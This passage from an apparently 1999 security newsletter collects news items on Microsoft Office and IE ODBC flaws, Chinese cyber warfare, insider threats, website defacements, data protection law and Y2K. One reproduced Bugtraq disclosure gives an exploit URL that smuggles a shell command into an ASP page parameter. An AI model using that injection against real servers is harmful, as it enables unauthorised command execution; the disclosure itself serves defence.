Jennifer Powell, a member of The WELL since 1993, said the bank canceled her husband's credit card as a precautionary measure. She is thankful that no fraud has been reported, but she said her husband must now update payment information with every service paid for with that credit card.

"It's not severe, but it's a pain," she said.

The WELL provided Internet service until 1996, when it split off its ISP division. Whole Networks then took over the division, and GST Telecommunications took over Whole Networks, bringing along some of The WELL's customers for the ride.

@HWA

35.0 MICROSOFT SECURITY FLAWS
     ~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Tuesday 3rd August 1999 on 7:50 pm CET

New York Times did an article on the ever growing number of bugs regarding Microsoft Internet Explorer. The main problem comes when IE opens Word, Power Point or Excel documents and it assumes that the documents are safe, so it doesn't open any warning box. Microsoft have a solution to this problem in a little Java applet. Read the article here.

http://www.nytimes.com/library/tech/99/08/biztech/articles/03soft.html

Software Makers Scramble to Address Security Flaw
By SARA ROBINSON

SAN FRANCISCO -- Three giants of the computer industry -- Microsoft, Hewlett-Packard and Compaq Computer -- found themselves scrambling on Tuesday to address a rash of serious security vulnerabilities in software designed to interact with Microsoft's Internet Explorer Web browser.

The flaws, first made public last week, are particularly insidious because they allow intruders to plant malicious programs on a computer merely by sending an e-mail message or by luring a victim to a malicious Web page that automatically plants a file on the visitor's hard drive.

In either case, the victim would receive no warning of a potential security violation because the flaws enable intruders to bypass the security controls of Internet Explorer and pass undetected through traps set by antivirus software.

Tom Noonan, president of Internet Security Systems in Atlanta, said on Tuesday that several of his client corporations had expressed concern that "now that this information is in the wild, their systems are exposed."
"They worry that they are building their network on top of a vulnerable system," he said. Unlike the Melissa virus or the Explore.exe worm, programs that exploit these newly discovered security bugs do not require that the victim take any action; rather, such programs can be activated if a user merely reads a malicious piece of e-mail while online. As of this evening, there had been no reports of intruders having exploited the flaws, but Microsoft announced that the problems had prompted plans for a major change in the security design of its Windows operating system and the Internet Explorer browser that it recently integrated into Windows. Currently, if Internet Explorer encounters on-line documents created by one of the Microsoft Office suite of programs -- Word, Excel or Powerpoint -- it assumes that they are "safe" and loads them on the user's computer without warning. The problem is that these are very powerful documents capable of launching executable code, whether benign or malicious. Microsoft said future operating systems would not trust such documents. Andrew Dixon, the Microsoft Office product manager, said the company was developing an applet, or small Java program, that would issue a warning before opening Office documents. The immediate problem with Office is that Word or Excel documents can relay an arbitrary command to a computer through a flawed data-base component that shipped with all but the last boxes of Office 97. The Office team worked over the weekend to develop and test a solution to this, Dixon said. But by this evening they still did not feel confident enough to release a patch for the problem to the 50 million registered users of Office 97. When a patch is available, he said, it will be posted on the Web at http://officeupdate.microsoft.com/Articles/MDACtyp.htm. In addition to the Office flaws, security holes were found last week in software shipped with Hewlett-Packard's Pavilion models and Compaq's Presarios. 
Both models were designed to offer customers remote support via the Internet, using Microsoft's browser. Both computer makers configured the browser to allow powerful little programs to run without warning the user. Unfortunately, these applets have the ability to run any other programs.

Hewlett-Packard planned to have a patch available soon, said a company spokesman, Ray Aldrich. He said the fix would be posted on the Web at http://www.hp.com/support/hppavilion.html.

"We believe this problem is serious and should be immediately addressed," Aldrich said. "We do so much testing but sometimes we miss stuff."

Hedy Baker, the public relations manager for Compaq's consumer product division, said the company planned to issue an advisory on Wednesday to Compaq support centers and expected to send out a software update to owners of the affected Presarios by the end of next week.

@HWA

36.0 CHINESE CYBER WARRIORS
     ~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Tuesday 3rd August 1999 on 7:39 pm CET

After NATO strikes on Yugoslavia, when China's embassy was accidentally hit, cyber war between American and Chinese hackers started. Chinese military wants to train, as they say "professional cyber warriors" to be ready for on-line battle. More on the topic from managing editor of asia.internet.com here.

From asia.internet.com

Chinese Military Seeks to Train Cyber Warriors
August 3, 1999
By Hans Lombardo
Managing Editor, asia.internet.com International News Archives

[Hong Kong, CHINA] The Chinese military hopes to develop the capability of engaging in warfare over the Internet by training hackers to take the battle online.

The Liberation Army Daily (LAD), a mouthpiece of China's Peoples Liberation Army (PLA), recently called for the development of this capability. The paper said that, by recruiting civilian hackers and training "cyber warriors" at Army schools, China could be prepared for an Internet war.
The call was made in response to several hacking incidents in the US and China after NATO's bombing of China's Belgrade Embassy. The Army paper reported that a "battle" was fought on the Internet between US and Chinese hackers.

In May, Chinese hackers infiltrated various US government sites including the Department of Energy (DOE), the Department of the Interior (DOI), the US Embassy in China, and the Naval Communications Command. Nearly a thousand US civilian sites were broken into in the two days following the bombing, sources said. According to the Chinese military paper, US hackers responded by "counterattacking" several civilian sites in China.

More recently, the Chinese government has been accused of waging a cyber war against the outlawed Chinese sect, Falun Gong. Webmasters in Canada, the US, and the UK have reported that their sites, hosting or linking to the sect's sites, were sabotaged or brought down by hackers traced to Chinese domains.

In addition to this, Beijing has moved its rhetorical campaign against the sect on to the Web. The China Internet Information Center and The China Daily have set up anti-Falun Gong sites.

@HWA

37.0 MICROSOFT AND SECURITY (AGAIN)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Tuesday 3rd August 1999 on 6:30 pm CET

SecurityPortal has a nice analysis of Microsoft's problem with security (below). Their conclusion: realize MS isn't going away, but they need to be held accountable for the security of their products before they are released as well as after they are in production. The open source initiative is mentioned here as a possible way to do that and keep track of those problems. But then still, the Windows 9x product needs to die. CNET has an article on the new MS OS beta-versions, is MS learning their lesson? See for yourself below.

CNET: Does Microsoft's next OS point to strategy shift?
By Stephanie Miles Staff Writer, CNET News.com August 3, 1999, 6:15 a.m.
PT URL: http://www.news.com/News/Item/0,4,40064,00.html Microsoft's next consumer operating system will meld together bits and pieces of both Windows 98 and Windows 2000, according to those who have seen an early version of the release, a hodgepodge that raises questions about the company's overall strategy for its consumer platform. Microsoft has changed its strategy for the future of consumer Windows several times in the last few years, reacting to various hardware advances, delays in the release of its corporate operating system, and personnel reorganizations within the company. Currently, the official stance is this: Microsoft will release Millennium, another version of Windows 98, next year and Neptune, a consumer version of NT, in 2001 at the earliest. However, the lines are not clear-cut because beta testers now report that Millennium contains elements of Windows NT, the consumerish Windows 98 and Windows 2000, a corporate desktop operating system coming at the end of this year. Microsoft recently released a preliminary version of the Millennium code to developers and hardware partners. Although observers say these kinds of twists and turns are typical on the road to a major software release, some critics wonder if all the changes might actually be fueled by competitive challenges, such as the Linux operating system and America Online's popular instant messaging software. If anything, Microsoft appears to be busy grafting. The Windows Explorer file manager appears to be comprised almost completely of Windows 2000 code and is identified in the operating system as being from Windows 2000, according to Chris Hilbert, Webmaster at BetaNews, a beta testing Web site, while some of the help files appear to be based on Windows 98, Second Edition. 
"I think Millennium is just something they threw together to ooh and ahh the audience with this developer release," Hilbert said, adding that he does believe that the core of the operating system is based on Windows 98, as Microsoft has said. "I believe the guts, or kernel of the operating system, is still Windows 98 based, although a good portion of [Windows] Explorer does show signs of being Windows 2000." Originally, last year's Windows 98 was targeted as the last release based on the DOS operating system. Future consumer operating systems were expected to be based on Windows 2000, a variant of Windows NT. That strategy was then scuttled in favor of continuing the life of Windows 98 through incremental updates. Windows 98 Second Edition, released earlier this summer, was one such update. Millennium will be another. Windows 2000 has since been a victim of numerous delays, but is expected in corporate systems by the end of the year. Microsoft product managers could not replicate any scenarios that would identify the software as anything other than Millennium, a company spokesperson said, but conceded that the development team may have lifted code for minor features like dialogue boxes from Windows 2000. "There's no reason to invent whole new code--but that doesn't affect the fact that they're based on completely separate kernels," she said, explaining that using different code is merely a shortcut for the development team. "It shouldn't be necessary to reinvent the wheel. They can use the efforts of other groups." But testers assert that the situation affects far more than an isolated dialogue box or two. Justin Jenkins, Webmaster of BetaLabs calls Millennium "Windows 2000 skin over Windows 98, as far as I can tell." It's still quite early in the development process for Millennium, and Hilbert notes that trial versions of Windows 98 contained references to Windows 95. 
However, developers and hardware partners depend on early releases of operating system software to make long-term product plans, analysts say.

www.securityportal.com

Security: How big of a chink in Microsoft's armor?
BO2K Information Center

August 2, 1999 - This past week's news of yet another major security vulnerability with Microsoft's products, this time with the ODBC database driver in Excel 97, has led SecurityPortal.com to take a look at the big picture, and attempt to understand how big of a security problem Microsoft has.

This latest security vulnerability is one of the most frightening to date, as it allows shell commands to be executed by opening a spreadsheet, without any warning whatsoever. The ODBC database driver, installed with Excel 97, supports a wide variety of system calls as part of its middleware approach to integrating applications. Among these APIs is an ability to invoke shell commands. Because this is ODBC, and not a macro, there is no warning imparted to the user. A user could download a spreadsheet, only to find that it has deleted files, made registry entries, or a number of other malicious acts, completely in stealth.

Do security problems plague Microsoft because of their size, or are there other reasons?

There are plenty of reasons to love or hate Microsoft. If you have owned Microsoft stock for the past several years, you probably love them. If you have tried to compete with them on any front, you probably hate them. Their penchant for consuming any technology or application space is well known, from dominating the word processor market to eating away at Netscape's browser share to attempting to co-opt Java. Microsoft has shown no fear of getting into new businesses and has experienced mixed results, such as with WebTV, City Sidewalk and several others. No doubt, Microsoft plays the role of the 800 pound gorilla to perfection, and they are a magnet for publicity, both good and bad.
As Microsoft aggressively pursues new markets and continued dominance in existing markets, are they adequately protecting the backdoor?

Microsoft is in the crosshairs of the hackers, that is no doubt. M$, Windoze - these negative nicknames are certainly only there to mock Microsoft, and there do not seem to be equivalent negative terms for other companies. There is a fair amount of validity to Microsoft's claim that Back Orifice 2000, for example, could have been written for other platforms and was mostly written to embarrass Microsoft. However, we believe it is a leap of faith to claim that all of Microsoft's security issues are relative to the popularity of their products, and other competing products have the same problems.

What are architectural differences between Microsoft operating systems and others?

Windows 98 and Windows NT are two completely different operating systems, each with its own heritage. Windows 98 can be traced back almost to the origins of the company itself, as it is an iteration of MS-DOS. Windows 98 is a personal operating system. Its design and capabilities are to act as a single user operating system, with penultimate consideration being given to that one person behind the keyboard. The efforts put into Windows over the years have been to simplify the tasks of that one person, with considerations for the rest of the world being bolted on: network access, file sharing and of course, security. There is no concept of different levels of local system authority, user context versus administrative, file system permissions, etc. It is a completely unsophisticated core operating system that over time has been overlaid with a terrific set of end user features. These are major issues with the Windows 9x operating system that make it wholly unsuited with the security requirements of the connected world.

Windows NT owes its existence to the fractured relationship Microsoft and IBM had over OS/2 ten years ago.
Microsoft didn't agree with IBM that Windows did not have a future and sought to build its own "OS/2" to compete in the enterprise market. Microsoft wanted it to be a GUI to the core, and although it was influenced by many technologies, notably VMS, it was a brand new operating system. Unlike Windows 9x, it was built to be a multi-user operating system from the beginning. The concepts of a superuser, user, guest, contexts, inherited privileges are all in there. The Local Security Authority of NT authenticates and provides access based upon access control lists that extend to file systems, processes and any other objects defined by the system. In essence, it has a lot of the security features of Unix; it is simply less mature, with more security bugs yet to be exploited. This immaturity often leads to add-on applications not fully taking advantage of the security model and defaulting to additional services being implemented in an insecure manner, often by installation with administrator rights. NT is just as susceptible to application borne viruses as 9x, including programs like Melissa, although a virus that tries to directly access hardware or specific files may be constrained by the user's privileges. While there are stark differences in the foundation and architecture of these two operating systems, there are also security vulnerabilities common to both platforms, caused by other product groups within Microsoft. The effort to create a tight integration of its operating systems with Internet Explorer and Office has not only gotten Microsoft into hot water with the Department of Justice over possible antitrust violations, but has created an integrated security nightmare. Because of this integration, Windows 98 and NT (to a somewhat lesser degree, it depends upon the machine account privileges the user has) are unique among major operating systems in that a malicious hacker can create a program on a web site that can be opened and in one step destroy a computer. 
Tightly integrating applications with operating systems is bad for security, probably the worst thing Microsoft has done for security. In fact, it could be argued that Windows NT has a fairly good security model, until you start adding Microsoft applications on top of it.

Some observations:

The Windows 9X product needs to die, and Microsoft will need to be pushed to make this happen. There have been several occasions where the product end of the Windows 9X line has been predicted, even positioned by MS executives as a stepping stone to NT. Yet it has outlived even many internal projections within Microsoft, for the simple reason being that it is a cash cow. The momentum behind its huge legacy created a product that has by far outsold NT with lower development costs. How do you financially justify shutting something like that off? This is something that has been argued long and hard internally within Microsoft, to the point that you would probably be safer sharing a cab with an NT and Linux developer, than with an NT and Win98 developer. CIOs need to keep in mind that much of the future threats to their infrastructure will come from within, and there is no really safe place to use Windows 9x. If you need to run Windows, you need to run NT.

Microsoft needs to make secure computing the cornerstone of the company, and the foundation of every product and service offering. For the end user right now, Microsoft practices "Are you sure?" security: "Are you sure" you want to run this macro, open that file? In fact users are often uncertain if the file they are about to open is going to work as advertised, or is going to wreak havoc on their system. If you look at the Security tab within Internet Explorer, you see different "zones" that you can define settings for: Internet, Intranet, Trusted Sites and Restricted Sites. Even if users could accurately index the world according to these categories, it is very crude and not very useful.
Systems need to function under the principle of least privileges, and in a large Intranet for example, there could very definitely be one or two servers with malicious trojans. Microsoft haters need to know MS is not going away, and need to get over it. Industry giants die hard. Bill Gates has liked to tell the story about when he first saw kit microprocessors, he thought IBM was toast. I remember the first 80386 processors being promoted as a mainframe on a chip and again IBM was predicted to be in deep trouble. What people did not realize was that as expensive as the big iron was, the investment in mainframe applications, Cobol code and business processes was infinitely greater. The point here is that Microsoft is not going away. Enterprises with a heavy investment in Microsoft desktops are not going to upgrade to Linux stations with KDE en masse any time soon. Linux, with its heritage as a Unix derivative, and intense scrutiny by a million developers, is a strong competitive threat to the same hardware markets that Microsoft sells its own operating systems. While pushing Linux strongly on the desktop has not been a topic many CIOs have looked at closely, it is growing strongly and in many cases displacing NT in the application and file server market. We at SecurityPortal.com have made it no secret that we predict a rosy future for Linux. It is in fact a real long term threat to Windows, but not Microsoft. It is only a matter of time before Microsoft releases its own Linux distribution. Microsoft is not going anywhere and needs to be part of the security solution. Microsoft needs to be held accountable for the security of their products before they are released as well as after they are in production. There needs to be some independent review of Microsoft's code for security vulnerabilities. We can think of no better way to do this than to join the Open Source initiative and in effect put its software in the public domain. 
This would be a radical departure for Microsoft, but no other single action in the industry could do so much to improve security.

To get back to our original question, Security: How big of a chink in Microsoft's armor? It is a very big problem. The years of focus on user friendliness, leveraging operating system dominance against competitive applications and internal strife have built an insecure house of cards. We need to put the walls back between our applications and operating systems. We need third party auditing and accountability for code, possibly through Open Source initiatives within Microsoft. Most of all, we need every CIO to demand that Microsoft reinvent itself around security, just as it reinvented itself around the Internet a few years ago.

@HWA

38.0 THE ENEMY WITHIN
     ~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Tuesday 3rd August 1999 on 1:00 pm CET

"Companies think if they buy an expensive 'firewall', they are secure because the bad guys are outside. "In reality, the majority of the threat comes from within." Dealing with the fact computer hacking is often an inside job, here are some of the main targets of such an attack. Full story below.

AUG 3 1999

Computer hacking often an inside job

By LEONG CHAN TEIK

THE enemy is within -- that is the harsh reality that many companies have yet to grasp, so say two experts on computer network security.

Mr Jeff Moss, 29, director of professional services at Nasdaq-listed Secure Computing Corporation, said yesterday: "Companies think if they buy an expensive 'firewall', they are secure because the bad guys are outside.

"In reality, the majority of the threat comes from within."

He is a former hacker who now breaks into corporate networks only when employed by owners who want to find out their areas of vulnerability.

He told The Straits Times that at a basic level, employees can now easily buy software or download software from the Internet that allows them to read their colleagues' e-mail.
"There are many tools to do it for you. You don't need to know a lot of technical stuff." Frequently, that is not going to hurt anyone but there will be occasions when the companies' systems will be under threat. Said Mr Moss, who is conducting a seminar for some 200 government and private-sector IT staff here today: "One guy learnt that he was going to be fired. He had the whole day to really damage the network if he wanted to." A common weakness of networks is that they do not segregate, say, the engineering department from the accounting department. This makes for an open system that is vulnerable to attack from all corners. Mr Colin Smillie, 26, technical manager of Secure Computing, said a favourite target of hackers is other users' passwords. And it is an easy target. Once they have succeeded in getting the passwords, they can access confidential files or send e-mail. He said a solution lies in a pager-like device made by his company which generates passwords for one-time use only. The holder keys in his personal identification number into the device which will then generate the password he has to use the next time he logs onto the network. The network is pre-programmed to accept only that password. On the whole, Mr Moss and Mr Smillie said that companies should pay attention to designing systems that are resistant to an attack from within, which is more costly and complex to do. They have to hire more and brighter administrators. The danger is getting bigger by the day, said Mr Moss, who organises the yearly Def Con conventions in Las Vegas where law enforcement agencies such as the US Federal Bureau of Investigation and corporate America meet hackers from around the world to discuss security issues. "You now have more temporary workers, consultants, contractors and business partners who are there for the day. The trend of more and more people sharing data will continue," he said. 
@HWA

39.0 DRUNKEN HACKERS ON JERRY SPRINGER
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Tuesday 3rd August 1999 on 3:15 am CET

"Drunken hackers: The women who love them and the admins who fear them." Lol, yes the Website of the "Jerry Springer" show got hacked yesterday by "Hacking for Drunks". The story is on Newsbytes, the mirror on Attrition.org

http://attrition.org/mirror/attrition/com/www.jerryspringer.com/

Springer Website Hacked! On The Next Jerry Springer!

By Bob Woods, Newsbytes
CHICAGO, ILLINOIS, U.S.A., 02 Aug 1999, 3:48 PM CST

The phrase, "Drunken hackers: The women who love them and the admins who fear them," sounds like it would belong on the "Jerry Springer" show - or at least its accompanying Website. The phrase was indeed on the site, but no one from the show put it there.

A three-member group calling itself "Hacking for Drunks" (HFD) apparently cracked the site in recent days, putting up text on the site that sounds as if it were stolen from a promotional TV spot for the show. The site is located at http://www.jerryspringer.com

"On the next Jerry Springer... Meet beercan, b33rman, and beerb0ttl3," the hacked page began. "Three young men who have given there (sic) up their lives to alcohol abuse and computer hacking. They have agreed to come on Jerry to tell there story."

"These three men... will introduce everyone to their world of liquor, women, and computers," the text at the site went on. "You will meet people whos (sic) lives they have changed, and lives they have ruined. They will tell their tale of how they were draged (sic) into the computer underground, where the only rules... are there (sic) own."

"This amazing story of lost innocence will touch you, and keep you wondering what your children are doing on the weekends," the text on the cracked site added.

As of 4:00 PM EST, the Springer site had not been restored, Newsbytes notes.
Officials from neither the Jerry Springer show nor the company that produces the shockfest, Studios USA, could be immediately reached for comment.

Hacking for Drunks also claimed responsibility for the recent cracking of "The Blair Witch Project" Website, at http://www.blairwitch.com . The Blair Witch Project is a movie that gained a large following even before its release across the country, due in large part to Artisan Entertainment's Internet-based marketing of the flick.

The message at the Blair Witch site was much simpler: "BOO~!@#$%!... d1d w3 scar3 j00?"

The movie - made for $60,000 in the woods of Maryland - racked up $28.5 million this past weekend, in its first weekend of release to 800 theaters.

Reported By Newsbytes.com, http://www.newsbytes.com .

15:48 CST
Reposted 23:25 CST

@HWA

40.0 DATA PROTECTION NOT TO BE IGNORED
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Tuesday 3rd August 1999 on 3:00 am CET

A London-based legal firm has warned that organizations should not ignore their legal requirements with regards data protection on the Web. Next to the threat by the EU to take legal action against members who don't implement certain data protection legislations, the firm, Tarlo Lyons, warns of the legal implications of data protection for businesses. Story below

http://www.technologypost.com/ecommerce/DAILY/19990802105186419.asp?Section=Main

Published on Monday, August 2, 1999

E-COMMERCE

Data protection on Web should not be ignored

NEWSBYTES

Tarlo Lyons, a London-based legal firm that has been intricately involved with many aspects of the British government's information technology (IT) operations and legislation, has warned that organizations should not ignore their legal requirements with regards data protection on the Web.

The timely warning comes as the European Union (EU) has threatened legal action against nine EU member countries for failing to implement its new data protection legislation.
According to the EU press office in Brussels, warning letters have now been sent to government ministers in France, Luxembourg, the Netherlands, Germany, Ireland, the UK, Denmark, Spain, and Austria.

The legislation, which became law on a pan-European basis in October of last year, goes beyond existing single country laws in many EU member states in giving citizens very broad rights as to how their personal data is stored by companies.

Back in London, meanwhile, Andrew Rigby, head of e-commerce and digital media with Tarlo Lyons, said that many businesses operating in the EU may be sending personal data overseas - something which breaches Principle 8 of the new Data Protection Act 1998 and the European Union Directive number (95/46/EC) on the protection and free movement of personal information.

Despite the fact that many employees are unaware of the legal issues relating to transborder personal data transfers, Tarlo Lyons argues that the use of the Internet may cause breaches of the law.

The legal firm says that, because of the use of the Internet as a means of advertising and communication, many global businesses are quite often using it both to collect personal information and to send it to overseas offices.

Despite this stark warning, Tarlo Lyons is pragmatic enough to say that, in general terms, exporting data is fine if the receiving country is in the EU territories. Problems, however, can occur in countries outside the EU and where there are no similar laws protecting consumers sending personal information.

The law firm singles out the US for clear criticism in this regard, which it says does not have similar laws to those seen in the EC. It warns that, in the absence of reciprocal data protection laws in the importing country, global businesses need to enter into inter-company contracts so as to avoid breaching the law.
The bottom line to the increasing use of the Internet for personal data transmissions, the law firm says, is that businesses operating on a global scale cannot afford the adverse publicity of being in breach of something as fundamental as privacy and confidentiality.

Copyright (c) Post-Newsweek Business Information, Inc. All rights reserved.

@HWA

41.0 WIRELESS ENCRYPTION HANDHELDS
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Monday 2nd August 1999 on 11:50 pm CET

Puma Technology is said to announce this week that it will license Certicom's Secure Sockets Layer (SSL) technology for its Intellisync synchronization products. This will allow users on both Palm and Windows CE handheld devices to be able to use strong data encryption over any wireless network. Full story below.

Wireless data encryption due for handhelds

By Ephraim Schwartz
InfoWorld Electric
Posted at 6:25 AM PT, Aug 2, 1999

Handheld devices will get a boost in security this week when Puma Technology announces that it will license Certicom's Secure Sockets Layer (SSL) technology for its Intellisync synchronization products.

Corporate users of messaging, calendaring, and contact databases on both Palm and Windows CE handheld devices now will be able to synchronize over any wireless network with so-called strong data encryption. The next version of Intellisync Anywhere, due to ship later this year, will include the Certicom security software.

The ability to prevent the interception of data is a step toward adoption of handheld devices in the enterprise, but more is still needed, according to IT consultants and industry analysts.

"The lack of security never kept handhelds from being officially supported devices," said Travis Hoxmeir, a consultant at Akila, a Portland, Ore., company that helped the Pacific Gas and Electric Gas Transmission agency to deploy a handheld strategy.

"Within IT, security is an important issue, but users just say, 'I want [a handheld].
Security is somebody else's problem, not mine,' " Hoxmeir said.

Though the Certicom technology will guard against midair interception of data, a bigger problem for IT is what data employees are putting on their handhelds, according to Ken Dulaney, vice president of mobile computing at the Gartner Group, in San Jose, Calif.

The storage of company information on personally owned handheld devices is a serious problem, Dulaney said.

"We need something from Puma, like a console, that tracks what corporate data is flowing out to these devices," Dulaney added.

Puma Technology Inc., in San Jose, Calif., can be reached at www.pumatech.com. Certicom Corp., in Hayward, Calif., can be reached at www.certicom.com.

@HWA

42.0 Y2K TO AID IN CYBERDEFENSE
     ~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Monday 2nd August 1999 on 11:30 pm CET

The Senate last week took its first close look at how the knowledge gained and used to battle the Y2K problem can be used to guard now and in the future against attacks on the nation's infrastructure. In a testimony before the Senate Special Committee on the Y2K Technology Problem, federal experts said experience gained in this field could be used to confront infrastructure protection issues. Read more.

http://www.fcw.com/pubs/fcw/1999/0802/fcw-newssecurity-08-02-99.html

AUGUST 2, 1999

Feds say Y2K experience aids in cyberdefense

BY DIANE FRANK (diane_frank@fcw.com)

The Senate last week took its first close look at how the expertise and systems being developed to deal with the Year 2000 problem can be used now and in the future against intentional attacks on the nation's infrastructure.

Testifying before the Senate Special Committee on the Year 2000 Technology Problem, federal experts said experience gained by a special coordination center created to gather and share information on problems caused by the Year 2000 date change could be used to confront infrastructure protection issues.
However, the center itself may not be needed beyond next March. "Clearly, there will be much of value that will last beyond the [Year 2000 Information Coordination Center]," said John Koskinen, chairman of the President's Council on Year 2000 Conversion. "This is in effect our first real-time test...and ultimately, it is a great way for all of us to learn from this experience." President Clinton recently officially created the ICC, which will gather and share information on incidents worldwide caused by the Year 2000 date change. That information then will be used by agencies, state and local governments and the private sector for a coordinated response. The Senate committee is considering expanding its mission beyond the Year 2000 problem and its life span beyond Feb. 29 to oversee the information security and critical infrastructure protection efforts at the congressional level. But federal officials involved in infrastructure protection issues told the committee that the structures already are in place in the public and private sectors to handle critical infrastructure protection. The officials added that the ICC's information sharing mechanism and the partnerships created throughout government and industry as part of that sharing will be key when dealing with any incidents in the future when someone brings down a computer system that controls a country's transportation, communication or energy infrastructures. "Our collective efforts on Y2K should provide valuable lessons learned for the continuing activities of the NIPC and the federal lead agencies in dealing with cyber incidents after Y2K," said Michael Vatis, chief of the National Infrastructure Protection Center at the FBI. It is hoped that the experience gained from fixing the Year 2000 bug will cut down on the time it will take to develop future responses and management to critical infrastructure attacks, said John Tritak, director of the Critical Infrastructure Assurance Office. 
The Defense Department has plenty of experience dealing with cyberprotection issues, but it plans to rely heavily on the structures that are being put in place within the department to support the ICC, said Richard Schaeffer, director of infrastructure and information assurance at the Office of the Assistant Secretary of Defense for Command, Control, Communications and Intelligence. Experts throughout government and industry have started to refer to the Year 2000 problem as the first real test of protecting the critical infrastructure of the United States against computer system failures. Although any problems caused by the Year 2000 date change will be unintentional, focus is turning to the possible effect on the nation's infrastructure if someone deliberately attacked a system in an attempt to bring it down. Committee chairman Sen. Bob Bennett (R-Utah) and vice chairman Sen. Christopher Dodd (D-Conn.) also raised several possibilities for more concrete ways that agencies and industry can contribute, including continuing the ICC in the role of a critical infrastructure protection center, creating a new organization to oversee the coordination and even creating a "government chief information officer," who would be at the level of an assistant to the president. The key to infrastructure protection is how fast the response time is because the longer the response takes, the longer you are vulnerable, said Winn Schwartau, information warfare author and consultant. "We need a fundamental shift in the way we approach security," Schwartau said. "It requires an empowerment much farther down the chain of command." 
@HWA

43.0 Yet Another ODBC Bugged ASP Sample Page
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Approved-By: aleph1@SECURITYFOCUS.COM
Message-ID: <002901bed994$7765cca0$0cd66520@storm>
Date: Thu, 29 Jul 1999 04:32:05 -0300
Reply-To: "Wanderley J. Abreu Junior"
Sender: Bugtraq List
From: "Wanderley J. Abreu Junior"
Subject: Yet Another ODBC Bugged ASP Sample Page
X-To: Microsoft Product Security Response Team
To: BUGTRAQ@SECURITYFOCUS.COM

Dear Team,

Exploiting ODBC Features that come with your sample programs is not a mystery for any of us. So let me add one more ASP Sample with similar troubles:

http://server/ASPSamp/AdvWorks/equipment/catalog_type.asp

or yet

http://server/AdvWorks/equipment/catalog_type.asp

It lets you execute shell commands like the other scripts. It is an Active Server Page so it runs the query as a local user and doesn't need any type of Remote Data Service to access the DSN. It just requires the default DSN (advworks) set.

The Exploit command line can be for instance :

http://server/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c +dir+c:\")|

Sorry if this SERIOUS security failure was already reported.

Regards,

Wanderley Junior

@HWA

44.0 New security mailing lists available from Security Focus
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thu Aug 05 1999

Security Focus is now offering 3 new mailing lists. Bugtraq Spanish, Bugtraq Japanese & Security Focus News.

Security Focus is now offering 3 new mailing lists.
The first two are BUGTRAQ-JP (Japanese) and BUGTRAQ-ES (Spanish). The first one will be moderated by Nobuo Miwa and the second one by Hernan Ochoa. The third is SF-NEWS.

Here is the charter of the first two new lists:

BUGTRAQ-[JP,ES] is a full disclosure moderated mailing list for the *detailed* discussion and announcement of computer security vulnerabilities: what they are, how to exploit them, and how to fix them. The mailing list language is [Japanese|Spanish].

The mailing list is an offshoot of the BUGTRAQ mailing list. It was specifically created to allow people not comfortable with the English language that speak [Japanese|Spanish] to have access to the same high-quality information as in BUGTRAQ.

If you do feel comfortable understanding English we recommend you instead subscribe to BUGTRAQ. You can do so by sending email to LISTSERV@SECURITYFOCUS.COM with a message body of:

SUBS BUGTRAQ First-name Last-name

The moderator(s) of the list will make sure that any interesting discussion in BUGTRAQ is summarized, translated and posted to this list at least once a week. Similarly any new information covered on this list that has not already been discussed in BUGTRAQ will be translated and forwarded to it by the moderator(s).

To see the full charter of each list in its native language visit securityfocus.com and look under Forums.

The third new list is SF-NEWS. SF-NEWS is the Security Focus weekly summary mailing list. Of interest to BUGTRAQ readers is the inclusion of a summary list of vulnerabilities posted to BUGTRAQ and elsewhere. So if you are overwhelmed by the traffic in BUGTRAQ this may be the one for you. Other things covered include a summary of incidents reported in the INCIDENTS lists, a summary list of positions being offered or resumes being tendered as posted to the Security Jobs list, results from the weekly polls and Security Focus announcements.
To subscribe to any of these lists email LISTSERV@SECURITYFOCUS.COM with a message body of:

SUBS BUGTRAQ-JP First-name Last-name

or

SUBS BUGTRAQ-ES First-name Last-name

or

SUBS SF-NEWS First-name Last-name

@HWA

45.0 Beyond Virtual Vaccinations
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.sciencenews.org/sn_arc99/7_31_99/bob2.htm

(See url for graphics and charts, omitted from this textfile)

Beyond Virtual Vaccinations

Developing a digital immune system in bits and bytes

By Damaris Christensen

The fear of new, dangerous viruses sweeping through an unprotected population is not limited to public health officials. Computer researchers have long worried because typical virus-scanning computer programs—which essentially vaccinate machines against known viruses—become outdated as newly created viruses spread over the Internet.

Just as researchers turned to biology in applying the name virus to the pesky programs that could make computers sick, several groups have turned to biology for a new model of how to protect computers against unknown viruses. They are focusing on the human immune system.

These computer scientists hope to develop a digital system that, like the immune system, can quickly recognize and fight off known infections, identify new intruders and learn how to deter them, and remember all previously encountered pathogens. Such a system also needs to be safe, reliable, and secure.

A computer virus released in March aptly demonstrated the need for more-effective ways of fighting off computer viruses. Although warnings about the Melissa virus went out soon after it was identified, it spread as quickly as the alarms (SN: 5/8/99, p. 303). Within just a few days, the virus had circled the globe, sending countless unwanted E-mail messages across the Internet and clogging E-mail service at hundreds of organizations, forcing them to shut off their Internet connections.
